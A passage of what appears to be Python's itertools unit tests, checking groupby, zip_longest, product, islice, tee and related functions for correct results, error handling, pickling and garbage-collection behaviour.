_, g = next(it)
next(it)
next(it)
self.assertEqual(list(pickle.loads(pickle.dumps(g, proto))), [])
# Exercise pipes and filters style
s = 'abracadabra'
# sort s | uniq
r = [k for k, g in groupby(sorted(s))]
self.assertEqual(r, ['a', 'b', 'c', 'd', 'r'])
# sort s | uniq -d
r = [k for k, g in groupby(sorted(s)) if list(islice(g,1,2))]
self.assertEqual(r, ['a', 'b', 'r'])
# sort s | uniq -c
r = [(len(list(g)), k) for k, g in groupby(sorted(s))]
self.assertEqual(r, [(5, 'a'), (2, 'b'), (1, 'c'), (1, 'd'), (2, 'r')])
# sort s | uniq -c | sort -rn | head -3
r = sorted([(len(list(g)) , k) for k, g in groupby(sorted(s))], reverse=True)[:3]
self.assertEqual(r, [(5, 'a'), (2, 'r'), (2, 'b')])
# iter.__next__ failure
class ExpectedError(Exception):
pass
def delayed_raise(n=0):
for i in range(n):
yield 'yo'
raise ExpectedError
def gulp(iterable, keyp=None, func=list):
return [func(g) for k, g in groupby(iterable, keyp)]
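# delayed_raise(n) yields n items and then raises ExpectedError; gulp() fully consumes every
# group from groupby(), so the error can surface on either the outer or the inner iterator.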
# iter.__next__ failure on outer object
self.assertRaises(ExpectedError, gulp, delayed_raise(0))
# iter.__next__ failure on inner object
self.assertRaises(ExpectedError, gulp, delayed_raise(1))
# __eq__ failure
class DummyCmp:
def __eq__(self, dst):
raise ExpectedError
s = [DummyCmp(), DummyCmp(), None]
# __eq__ failure on outer object
self.assertRaises(ExpectedError, gulp, s, func=id)
# __eq__ failure on inner object
self.assertRaises(ExpectedError, gulp, s)
# keyfunc failure
def keyfunc(obj):
if keyfunc.skip > 0:
keyfunc.skip -= 1
return obj
else:
raise ExpectedError
# keyfunc failure on outer object
keyfunc.skip = 0
self.assertRaises(ExpectedError, gulp, [None], keyfunc)
keyfunc.skip = 1
self.assertRaises(ExpectedError, gulp, [None, None], keyfunc)
def test_filter(self):
self.assertEqual(list(filter(isEven, range(6))), [0,2,4])
self.assertEqual(list(filter(None, [0,1,0,2,0])), [1,2])
self.assertEqual(list(filter(bool, [0,1,0,2,0])), [1,2])
self.assertEqual(take(4, filter(isEven, count())), [0,2,4,6])
self.assertRaises(TypeError, filter)
self.assertRaises(TypeError, filter, lambda x:x)
self.assertRaises(TypeError, filter, lambda x:x, range(6), 7)
self.assertRaises(TypeError, filter, isEven, 3)
self.assertRaises(TypeError, next, filter(range(6), range(6)))
# check copy, deepcopy, pickle
ans = [0,2,4]
c = filter(isEven, range(6))
self.assertEqual(list(copy.copy(c)), ans)
c = filter(isEven, range(6))
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = filter(isEven, range(6))
self.assertEqual(list(pickle.loads(pickle.dumps(c, proto))), ans)
next(c)
self.assertEqual(list(pickle.loads(pickle.dumps(c, proto))), ans[1:])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = filter(isEven, range(6))
self.pickletest(proto, c)
def test_filterfalse(self):
self.assertEqual(list(filterfalse(isEven, range(6))), [1,3,5])
self.assertEqual(list(filterfalse(None, [0,1,0,2,0])), [0,0,0])
self.assertEqual(list(filterfalse(bool, [0,1,0,2,0])), [0,0,0])
self.assertEqual(take(4, filterfalse(isEven, count())), [1,3,5,7])
self.assertRaises(TypeError, filterfalse)
self.assertRaises(TypeError, filterfalse, lambda x:x)
self.assertRaises(TypeError, filterfalse, lambda x:x, range(6), 7)
self.assertRaises(TypeError, filterfalse, isEven, 3)
self.assertRaises(TypeError, next, filterfalse(range(6), range(6)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, filterfalse(isEven, range(6)))
def test_zip(self):
# XXX This is rather silly now that the builtin zip() is itertools' former izip()
ans = [(x,y) for x, y in zip('abc',count())]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(list(zip('abc', range(6))), lzip('abc', range(6)))
self.assertEqual(list(zip('abcdef', range(3))), lzip('abcdef', range(3)))
self.assertEqual(take(3,zip('abcdef', count())), lzip('abcdef', range(3)))
self.assertEqual(list(zip('abcdef')), lzip('abcdef'))
self.assertEqual(list(zip()), lzip())
self.assertRaises(TypeError, zip, 3)
self.assertRaises(TypeError, zip, range(3), 3)
self.assertEqual([tuple(list(pair)) for pair in zip('abc', 'def')],
lzip('abc', 'def'))
self.assertEqual([pair for pair in zip('abc', 'def')],
lzip('abc', 'def'))
@support.impl_detail("tuple reuse is specific to CPython")
def test_zip_tuple_reuse(self):
ids = list(map(id, zip('abc', 'def')))
self.assertEqual(min(ids), max(ids))
ids = list(map(id, list(zip('abc', 'def'))))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
# check copy, deepcopy, pickle
ans = [(x,y) for x, y in copy.copy(zip('abc',count()))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
ans = [(x,y) for x, y in copy.deepcopy(zip('abc',count()))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
ans = [(x,y) for x, y in pickle.loads(pickle.dumps(zip('abc',count()), proto))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
testIntermediate = zip('abc',count())
next(testIntermediate)
ans = [(x,y) for x, y in pickle.loads(pickle.dumps(testIntermediate, proto))]
self.assertEqual(ans, [('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, zip('abc', count()))
def test_ziplongest(self):
for args in [
['abc', range(6)],
[range(6), 'abc'],
[range(1000), range(2000,2100), range(3000,3050)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500), range(0)],
]:
target = [tuple([arg[i] if i < len(arg) else None for arg in args])
for i in range(max(map(len, args)))]
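# target pads each row with None up to the longest input, mirroring zip_longest's default fillvalue.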
self.assertEqual(list(zip_longest(*args)), target)
self.assertEqual(list(zip_longest(*args, **{})), target)
target = [tuple((e is None and 'X' or e) for e in t) for t in target] # Replace None fills with 'X'
self.assertEqual(list(zip_longest(*args, **dict(fillvalue='X'))), target)
self.assertEqual(take(3,zip_longest('abcdef', count())), list(zip('abcdef', range(3)))) # take 3 from infinite input
self.assertEqual(list(zip_longest()), list(zip()))
self.assertEqual(list(zip_longest([])), list(zip([])))
self.assertEqual(list(zip_longest('abcdef')), list(zip('abcdef')))
self.assertEqual(list(zip_longest('abc', 'defg', **{})),
list(zip(list('abc')+[None], 'defg'))) # empty keyword dict
self.assertRaises(TypeError, zip_longest, 3)
self.assertRaises(TypeError, zip_longest, range(3), 3)
for stmt in [
"zip_longest('abc', fv=1)",
"zip_longest('abc', fillvalue=1, bogus_keyword=None)",
]:
try:
eval(stmt, globals(), locals())
except TypeError:
pass
else:
self.fail('Did not raise TypeError in: ' + stmt)
self.assertEqual([tuple(list(pair)) for pair in zip_longest('abc', 'def')],
list(zip('abc', 'def')))
self.assertEqual([pair for pair in zip_longest('abc', 'def')],
list(zip('abc', 'def')))
@support.impl_detail("tuple reuse is specific to CPython")
def test_zip_longest_tuple_reuse(self):
ids = list(map(id, zip_longest('abc', 'def')))
self.assertEqual(min(ids), max(ids))
ids = list(map(id, list(zip_longest('abc', 'def'))))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
def test_zip_longest_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, zip_longest("abc", "def"))
self.pickletest(proto, zip_longest("abc", "defgh"))
self.pickletest(proto, zip_longest("abc", "defgh", fillvalue=1))
self.pickletest(proto, zip_longest("", "defgh"))
def test_zip_longest_bad_iterable(self):
exception = TypeError()
class BadIterable:
def __iter__(self):
raise exception
with self.assertRaises(TypeError) as cm:
zip_longest(BadIterable())
self.assertIs(cm.exception, exception)
def test_bug_7244(self):
class Repeater:
# this class is similar to itertools.repeat
def __init__(self, o, t, e):
self.o = o
self.t = int(t)
self.e = e
def __iter__(self): # its iterator is itself
return self
def __next__(self):
if self.t > 0:
self.t -= 1
return self.o
else:
raise self.e
# Formerly this code would fail in debug mode with an
# undetected error and a spurious StopIteration
r1 = Repeater(1, 3, StopIteration)
r2 = Repeater(2, 4, StopIteration)
def run(r1, r2):
result = []
for i, j in zip_longest(r1, r2, fillvalue=0):
with support.captured_output('stdout'):
print((i, j))
result.append((i, j))
return result
self.assertEqual(run(r1, r2), [(1,2), (1,2), (1,2), (0,2)])
# Formerly, the RuntimeError would be swallowed and iteration
# would stop as if a normal StopIteration had occurred
r1 = Repeater(1, 3, RuntimeError)
r2 = Repeater(2, 4, StopIteration)
it = zip_longest(r1, r2, fillvalue=0)
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertRaises(RuntimeError, next, it)
def test_pairwise(self):
self.assertEqual(list(pairwise('')), [])
self.assertEqual(list(pairwise('a')), [])
self.assertEqual(list(pairwise('ab')),
[('a', 'b')]),
self.assertEqual(list(pairwise('abcde')),
[('a', 'b'), ('b', 'c'), ('c', 'd'), ('d', 'e')])
self.assertEqual(list(pairwise(range(10_000))),
list(zip(range(10_000), range(1, 10_000))))
with self.assertRaises(TypeError):
pairwise() # too few arguments
with self.assertRaises(TypeError):
pairwise('abc', 10) # too many arguments
with self.assertRaises(TypeError):
pairwise(iterable='abc') # keyword arguments
with self.assertRaises(TypeError):
pairwise(None) # non-iterable argument
def test_product(self):
for args, result in [
([], [()]), # zero iterables
(['ab'], [('a',), ('b',)]), # one iterable
([range(2), range(3)], [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]), # two iterables
([range(0), range(2), range(3)], []), # first iterable with zero length
([range(2), range(0), range(3)], []), # middle iterable with zero length
([range(2), range(3), range(0)], []), # last iterable with zero length
]:
self.assertEqual(list(product(*args)), result)
for r in range(4):
self.assertEqual(list(product(*(args*r))),
list(product(*args, **dict(repeat=r))))
self.assertEqual(len(list(product(*[range(7)]*6))), 7**6)
self.assertRaises(TypeError, product, range(6), None)
def product1(*args, **kwds):
pools = list(map(tuple, args)) * kwds.get('repeat', 1)
n = len(pools)
if n == 0:
yield ()
return
if any(len(pool) == 0 for pool in pools):
return
indices = [0] * n
yield tuple(pool[i] for pool, i in zip(pools, indices))
while 1:
for i in reversed(range(n)): # right to left
if indices[i] == len(pools[i]) - 1:
continue
indices[i] += 1
for j in range(i+1, n):
indices[j] = 0
yield tuple(pool[i] for pool, i in zip(pools, indices))
break
else:
return
def product2(*args, **kwds):
'Pure python version used in docs'
pools = list(map(tuple, args)) * kwds.get('repeat', 1)
result = [[]]
for pool in pools:
result = [x+[y] for x in result for y in pool]
for prod in result:
yield tuple(prod)
argtypes = ['', 'abc', '', range(0), range(4), dict(a=1, b=2, c=3),
set('abcdefg'), range(11), tuple(range(13))]
for i in range(100):
args = [random.choice(argtypes) for j in range(random.randrange(5))]
expected_len = prod(map(len, args))
self.assertEqual(len(list(product(*args))), expected_len)
self.assertEqual(list(product(*args)), list(product1(*args)))
self.assertEqual(list(product(*args)), list(product2(*args)))
args = map(iter, args)
self.assertEqual(len(list(product(*args))), expected_len)
@support.bigaddrspacetest
def test_product_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
product(*(['ab']*2**5), repeat=2**25)
@support.impl_detail("tuple reuse is specific to CPython")
def test_product_tuple_reuse(self):
self.assertEqual(len(set(map(id, product('abc', 'def')))), 1)
self.assertNotEqual(len(set(map(id, list(product('abc', 'def'))))), 1)
def test_product_pickling(self):
# check copy, deepcopy, pickle
for args, result in [
([], [()]), # zero iterables
(['ab'], [('a',), ('b',)]), # one iterable
([range(2), range(3)], [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]), # two iterables
([range(0), range(2), range(3)], []), # first iterable with zero length
([range(2), range(0), range(3)], []), # middle iterable with zero length
([range(2), range(3), range(0)], []), # last iterable with zero length
]:
self.assertEqual(list(copy.copy(product(*args))), result)
self.assertEqual(list(copy.deepcopy(product(*args))), result)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, product(*args))
def test_product_issue_25021(self):
# test that indices are properly clamped to the length of the tuples
p = product((1, 2),(3,))
p.__setstate__((0, 0x1000)) # will access tuple element 1 if not clamped
self.assertEqual(next(p), (2, 3))
# test that an empty tuple in the argument list results in an immediate StopIteration
p = product((1, 2), (), (3,))
p.__setstate__((0, 0, 0x1000)) # will access tuple element 1 if not clamped
self.assertRaises(StopIteration, next, p)
def test_repeat(self):
self.assertEqual(list(repeat(object='a', times=3)), ['a', 'a', 'a'])
self.assertEqual(lzip(range(3),repeat('a')),
[(0, 'a'), (1, 'a'), (2, 'a')])
self.assertEqual(list(repeat('a', 3)), ['a', 'a', 'a'])
self.assertEqual(take(3, repeat('a')), ['a', 'a', 'a'])
self.assertEqual(list(repeat('a', 0)), [])
self.assertEqual(list(repeat('a', -3)), [])
self.assertRaises(TypeError, repeat)
self.assertRaises(TypeError, repeat, None, 3, 4)
self.assertRaises(TypeError, repeat, None, 'a')
r = repeat(1+0j)
self.assertEqual(repr(r), 'repeat((1+0j))')
r = repeat(1+0j, 5)
self.assertEqual(repr(r), 'repeat((1+0j), 5)')
list(r)
self.assertEqual(repr(r), 'repeat((1+0j), 0)')
# check copy, deepcopy, pickle
c = repeat(object='a', times=10)
self.assertEqual(next(c), 'a')
self.assertEqual(take(2, copy.copy(c)), list('a' * 2))
self.assertEqual(take(2, copy.deepcopy(c)), list('a' * 2))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, repeat(object='a', times=10))
def test_repeat_with_negative_times(self):
self.assertEqual(repr(repeat('a', -1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', -2)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-2)), "repeat('a', 0)")
def test_map(self):
self.assertEqual(list(map(operator.pow, range(3), range(1,7))),
[0**1, 1**2, 2**3])
self.assertEqual(list(map(tupleize, 'abc', range(5))),
[('a',0),('b',1),('c',2)])
self.assertEqual(list(map(tupleize, 'abc', count())),
[('a',0),('b',1),('c',2)])
self.assertEqual(take(2,map(tupleize, 'abc', count())),
[('a',0),('b',1)])
self.assertEqual(list(map(operator.pow, [])), [])
self.assertRaises(TypeError, map)
self.assertRaises(TypeError, list, map(None, range(3), range(3)))
self.assertRaises(TypeError, map, operator.neg)
self.assertRaises(TypeError, next, map(10, range(5)))
self.assertRaises(ValueError, next, map(errfunc, [4], [5]))
self.assertRaises(TypeError, next, map(onearg, [4], [5]))
# check copy, deepcopy, pickle
ans = [('a',0),('b',1),('c',2)]
c = map(tupleize, 'abc', count())
self.assertEqual(list(copy.copy(c)), ans)
c = map(tupleize, 'abc', count())
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = map(tupleize, 'abc', count())
self.pickletest(proto, c)
def test_starmap(self):
self.assertEqual(list(starmap(operator.pow, zip(range(3), range(1,7)))),
[0**1, 1**2, 2**3])
self.assertEqual(take(3, starmap(operator.pow, zip(count(), count(1)))),
[0**1, 1**2, 2**3])
self.assertEqual(list(starmap(operator.pow, [])), [])
self.assertEqual(list(starmap(operator.pow, [iter([4,5])])), [4**5])
self.assertRaises(TypeError, list, starmap(operator.pow, [None]))
self.assertRaises(TypeError, starmap)
self.assertRaises(TypeError, starmap, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, starmap(10, [(4,5)]))
self.assertRaises(ValueError, next, starmap(errfunc, [(4,5)]))
self.assertRaises(TypeError, next, starmap(onearg, [(4,5)]))
# check copy, deepcopy, pickle
ans = [0**1, 1**2, 2**3]
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.assertEqual(list(copy.copy(c)), ans)
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.pickletest(proto, c)
def test_islice(self):
for args in [ # islice(args) should agree with range(args)
(10, 20, 3),
(10, 3, 20),
(10, 20),
(10, 10),
(10, 3),
(20,)
]:
self.assertEqual(list(islice(range(100), *args)),
list(range(*args)))
for args, tgtargs in [ # Stop when seqn is exhausted
((10, 110, 3), ((10, 100, 3))),
((10, 110), ((10, 100))),
((110,), (100,))
]:
self.assertEqual(list(islice(range(100), *args)),
list(range(*tgtargs)))
# Test stop=None
self.assertEqual(list(islice(range(10), None)), list(range(10)))
self.assertEqual(list(islice(range(10), None, None)), list(range(10)))
self.assertEqual(list(islice(range(10), None, None, None)), list(range(10)))
self.assertEqual(list(islice(range(10), 2, None)), list(range(2, 10)))
self.assertEqual(list(islice(range(10), 1, None, 2)), list(range(1, 10, 2)))
# Test number of items consumed SF #1171417
it = iter(range(10))
self.assertEqual(list(islice(it, 3)), list(range(3)))
self.assertEqual(list(it), list(range(3, 10)))
it = iter(range(10))
self.assertEqual(list(islice(it, 3, 3)), [])
self.assertEqual(list(it), list(range(3, 10)))
# Test invalid arguments
ra = range(10)
self.assertRaises(TypeError, islice, ra)
self.assertRaises(TypeError, islice, ra, 1, 2, 3, 4)
self.assertRaises(ValueError, islice, ra, -5, 10, 1)
self.assertRaises(ValueError, islice, ra, 1, -5, -1)
self.assertRaises(ValueError, islice, ra, 1, 10, -1)
self.assertRaises(ValueError, islice, ra, 1, 10, 0)
self.assertRaises(ValueError, islice, ra, 'a')
self.assertRaises(ValueError, islice, ra, 'a', 1)
self.assertRaises(ValueError, islice, ra, 1, 'a')
self.assertRaises(ValueError, islice, ra, 'a', 1, 1)
self.assertRaises(ValueError, islice, ra, 1, 'a', 1)
self.assertEqual(len(list(islice(count(), 1, 10, maxsize))), 1)
# Issue #10323: leave the underlying iterator in a predictable state
c = count()
self.assertEqual(list(islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
# check copy, deepcopy, pickle
for args in [ # islice(args) should agree with range(args)
(10, 20, 3),
(10, 3, 20),
(10, 20),
(10, 3),
(20,)
]:
self.assertEqual(list(copy.copy(islice(range(100), *args))),
list(range(*args)))
self.assertEqual(list(copy.deepcopy(islice(range(100), *args))),
list(range(*args)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, islice(range(100), *args))
# Issue #21321: check source iterator is not referenced
# from islice() after the latter has been exhausted
it = (x for x in (1, 2))
wr = weakref.ref(it)
it = islice(it, 1)
self.assertIsNotNone(wr())
list(it) # exhaust the iterator
support.gc_collect()
self.assertIsNone(wr())
# Issue #30537: islice can accept integer-like objects as
# arguments
class IntLike(object):
def __init__(self, val):
self.val = val
def __index__(self):
return self.val
self.assertEqual(list(islice(range(100), IntLike(10))), list(range(10)))
self.assertEqual(list(islice(range(100), IntLike(10), IntLike(50))),
list(range(10, 50)))
self.assertEqual(list(islice(range(100), IntLike(10), IntLike(50), IntLike(5))),
list(range(10,50,5)))
def test_takewhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
self.assertEqual(list(takewhile(underten, data)), [1, 3, 5])
self.assertEqual(list(takewhile(underten, [])), [])
self.assertRaises(TypeError, takewhile)
self.assertRaises(TypeError, takewhile, operator.pow)
self.assertRaises(TypeError, takewhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, takewhile(10, [(4,5)]))
self.assertRaises(ValueError, next, takewhile(errfunc, [(4,5)]))
t = takewhile(bool, [1, 1, 1, 0, 0, 0])
self.assertEqual(list(t), [1, 1, 1])
self.assertRaises(StopIteration, next, t)
# check copy, deepcopy, pickle
self.assertEqual(list(copy.copy(takewhile(underten, data))), [1, 3, 5])
self.assertEqual(list(copy.deepcopy(takewhile(underten, data))),
[1, 3, 5])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, takewhile(underten, data))
def test_dropwhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
self.assertEqual(list(dropwhile(underten, data)), [20, 2, 4, 6, 8])
self.assertEqual(list(dropwhile(underten, [])), [])
self.assertRaises(TypeError, dropwhile)
self.assertRaises(TypeError, dropwhile, operator.pow)
self.assertRaises(TypeError, dropwhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, dropwhile(10, [(4,5)]))
self.assertRaises(ValueError, next, dropwhile(errfunc, [(4,5)]))
# check copy, deepcopy, pickle
self.assertEqual(list(copy.copy(dropwhile(underten, data))), [20, 2, 4, 6, 8])
self.assertEqual(list(copy.deepcopy(dropwhile(underten, data))),
[20, 2, 4, 6, 8])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, dropwhile(underten, data))
def test_tee(self):
n = 200
a, b = tee([]) # test empty iterator
self.assertEqual(list(a), [])
self.assertEqual(list(b), [])
a, b = tee(irange(n)) # test 100% interleaved
self.assertEqual(lzip(a,b), lzip(range(n), range(n)))
a, b = tee(irange(n)) # test 0% interleaved
self.assertEqual(list(a), list(range(n)))
self.assertEqual(list(b), list(range(n)))
a, b = tee(irange(n)) # test dealloc of leading iterator
for i in range(100):
self.assertEqual(next(a), i)
del a
self.assertEqual(list(b), list(range(n)))
a, b = tee(irange(n)) # test dealloc of trailing iterator
for i in range(100):
self.assertEqual(next(a), i)
del b
self.assertEqual(list(a), list(range(100, n)))
for j in range(5): # test randomly interleaved
order = [0]*n + [1]*n
random.shuffle(order)
lists = ([], [])
its = tee(irange(n))
for i in order:
value = next(its[i])
lists[i].append(value)
self.assertEqual(lists[0], list(range(n)))
self.assertEqual(lists[1], list(range(n)))
# test argument format checking
self.assertRaises(TypeError, tee)
self.assertRaises(TypeError, tee, 3)
self.assertRaises(TypeError, tee, [1,2], 'x')
self.assertRaises(TypeError, tee, [1,2], 3, 'x')
# tee object should be instantiable
a, b = tee('abc')
c = type(a)('def')
self.assertEqual(list(c), list('def'))
# test long-lagged and multi-way split
a, b, c = tee(range(2000), 3)
for i in range(100):
self.assertEqual(next(a), i)
self.assertEqual(list(b), list(range(2000)))
self.assertEqual([next(c), next(c)], list(range(2)))
self.assertEqual(list(a), list(range(100,2000)))
self.assertEqual(list(c), list(range(2,2000)))
# test values of n
self.assertRaises(TypeError, tee, 'abc', 'invalid')
self.assertRaises(ValueError, tee, [], -1)
for n in range(5):
result = tee('abc', n)
self.assertEqual(type(result), tuple)
self.assertEqual(len(result), n)
self.assertEqual([list(x) for x in result], [list('abc')]*n)
# tee pass-through to copyable iterator
a, b = tee('abc')
c, d = tee(a)
self.assertTrue(a is c)
# test tee_new
t1, t2 = tee('abc')
tnew = type(t1)
self.assertRaises(TypeError, tnew)
self.assertRaises(TypeError, tnew, 10)
t3 = tnew(t1)
self.assertTrue(list(t1) == list(t2) == list(t3) == list('abc'))
# test that tee objects are weakly referenceable
a, b = tee(range(10))
p = weakref.proxy(a)
self.assertEqual(getattr(p, '__class__'), type(b))
del a
support.gc_collect() # For PyPy or other GCs.
self.assertRaises(ReferenceError, getattr, p, '__class__')
ans = list('abc')
long_ans = list(range(10000))
# check copy
a, b = tee('abc')
self.assertEqual(list(copy.copy(a)), ans)
self.assertEqual(list(copy.copy(b)), ans)
a, b = tee(list(range(10000)))
self.assertEqual(list(copy.copy(a)), long_ans)
self.assertEqual(list(copy.copy(b)), long_ans)
# check partially consumed copy
a, b = tee('abc')
take(2, a)
take(1, b)
self.assertEqual(list(copy.copy(a)), ans[2:])
self.assertEqual(list(copy.copy(b)), ans[1:])
self.assertEqual(list(a), ans[2:])
self.assertEqual(list(b), ans[1:])
a, b = tee(range(10000))
take(100, a)
take(60, b)
self.assertEqual(list(copy.copy(a)), long_ans[100:])
self.assertEqual(list(copy.copy(b)), long_ans[60:])
self.assertEqual(list(a), long_ans[100:])
self.assertEqual(list(b), long_ans[60:])
# check deepcopy
a, b = tee('abc')
self.assertEqual(list(copy.deepcopy(a)), ans)
self.assertEqual(list(copy.deepcopy(b)), ans)
self.assertEqual(list(a), ans)
self.assertEqual(list(b), ans)
a, b = tee(range(10000))
self.assertEqual(list(copy.deepcopy(a)), long_ans)
self.assertEqual(list(copy.deepcopy(b)), long_ans)
self.assertEqual(list(a), long_ans)
self.assertEqual(list(b), long_ans)
# check partially consumed deepcopy
a, b = tee('abc')
take(2, a)
take(1, b)
self.assertEqual(list(copy.deepcopy(a)), ans[2:])
self.assertEqual(list(copy.deepcopy(b)), ans[1:])
self.assertEqual(list(a), ans[2:])
self.assertEqual(list(b), ans[1:])
a, b = tee(range(10000))
take(100, a)
take(60, b)
self.assertEqual(list(copy.deepcopy(a)), long_ans[100:])
self.assertEqual(list(copy.deepcopy(b)), long_ans[60:])
self.assertEqual(list(a), long_ans[100:])
self.assertEqual(list(b), long_ans[60:])
# check pickle
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, iter(tee('abc')))
a, b = tee('abc')
self.pickletest(proto, a, compare=ans)
self.pickletest(proto, b, compare=ans)
# Issue 13454: Crash when deleting backward iterator from tee()
def test_tee_del_backward(self):
forward, backward = tee(repeat(None, 20000000))
try:
any(forward) # exhaust the iterator
del backward
except:
del forward, backward
raise
def test_tee_reenter(self):
class I:
first = True
def __iter__(self):
return self
def __next__(self):
first = self.first
self.first = False
if first:
return next(b)
a, b = tee(I())
with self.assertRaisesRegex(RuntimeError, "tee"):
next(a)
def test_tee_concurrent(self):
start = threading.Event()
finish = threading.Event()
class I:
def __iter__(self):
return self
def __next__(self):
start.set()
finish.wait()
a, b = tee(I())
thread = threading.Thread(target=next, args=[a])
thread.start()
try:
start.wait()
with self.assertRaisesRegex(RuntimeError, "tee"):
next(b)
finally:
finish.set()
thread.join()
def test_StopIteration(self):
self.assertRaises(StopIteration, next, zip())
for f in (chain, cycle, zip, groupby):
self.assertRaises(StopIteration, next, f([]))
self.assertRaises(StopIteration, next, f(StopNow()))
self.assertRaises(StopIteration, next, islice([], None))
self.assertRaises(StopIteration, next, islice(StopNow(), None))
p, q = tee([])
self.assertRaises(StopIteration, next, p)
self.assertRaises(StopIteration, next, q)
p, q = tee(StopNow())
self.assertRaises(StopIteration, next, p)
self.assertRaises(StopIteration, next, q)
self.assertRaises(StopIteration, next, repeat(None, 0))
for f in (filter, filterfalse, map, takewhile, dropwhile, starmap):
self.assertRaises(StopIteration, next, f(lambda x:x, []))
self.assertRaises(StopIteration, next, f(lambda x:x, StopNow()))
@support.cpython_only
def test_combinations_result_gc(self):
# bpo-42536: combinations's tuple-reuse speed trick breaks the GC's
# assumptions about what can be untracked. Make sure we re-track result
# tuples whenever we reuse them.
it = combinations([None, []], 1)
next(it)
gc.collect()
# That GC collection probably untracked the recycled internal result
# tuple, which has the value (None,). Make sure it's re-tracked when
# it's mutated and returned from __next__:
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_combinations_with_replacement_result_gc(self):
# Ditto for combinations_with_replacement.
it = combinations_with_replacement([None, []], 1)
next(it)
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_permutations_result_gc(self):
# Ditto for permutations.
it = permutations([None, []], 1)
next(it)
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_product_result_gc(self):
# Ditto for product.
it = product([None, []])
next(it)
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_zip_longest_result_gc(self):
# Ditto for zip_longest.
it = zip_longest([[]])
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
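# Spot-check that each itertools function reproduces its documented examples.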
class TestExamples(unittest.TestCase):
def test_accumulate(self):
self.assertEqual(list(accumulate([1,2,3,4,5])), [1, 3, 6, 10, 15])
def test_accumulate_reducible(self):
# check copy, deepcopy, pickle
data = [1, 2, 3, 4, 5]
accumulated = [1, 3, 6, 10, 15]
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it = accumulate(data)
self.assertEqual(list(pickle.loads(pickle.dumps(it, proto))), accumulated[:])
self.assertEqual(next(it), 1)
self.assertEqual(list(pickle.loads(pickle.dumps(it, proto))), accumulated[1:])
it = accumulate(data)
self.assertEqual(next(it), 1)
self.assertEqual(list(copy.deepcopy(it)), accumulated[1:])
self.assertEqual(list(copy.copy(it)), accumulated[1:])
def test_accumulate_reducible_none(self):
# Issue #25718: total is None
it = accumulate([None, None, None], operator.is_)
self.assertEqual(next(it), None)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it_copy = pickle.loads(pickle.dumps(it, proto))
self.assertEqual(list(it_copy), [True, False])
self.assertEqual(list(copy.deepcopy(it)), [True, False])
self.assertEqual(list(copy.copy(it)), [True, False])
def test_chain(self):
self.assertEqual(''.join(chain('ABC', 'DEF')), 'ABCDEF')
def test_chain_from_iterable(self):
self.assertEqual(''.join(chain.from_iterable(['ABC', 'DEF'])), 'ABCDEF')
def test_combinations(self):
self.assertEqual(list(combinations('ABCD', 2)),
[('A','B'), ('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
self.assertEqual(list(combinations(range(4), 3)),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
def test_combinations_with_replacement(self):
self.assertEqual(list(combinations_with_replacement('ABC', 2)),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def test_compress(self):
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
def test_count(self):
self.assertEqual(list(islice(count(10), 5)), [10, 11, 12, 13, 14])
def test_cycle(self):
self.assertEqual(list(islice(cycle('ABCD'), 12)), list('ABCDABCDABCD'))
def test_dropwhile(self):
self.assertEqual(list(dropwhile(lambda x: x<5, [1,4,6,4,1])), [6,4,1])
def test_groupby(self):
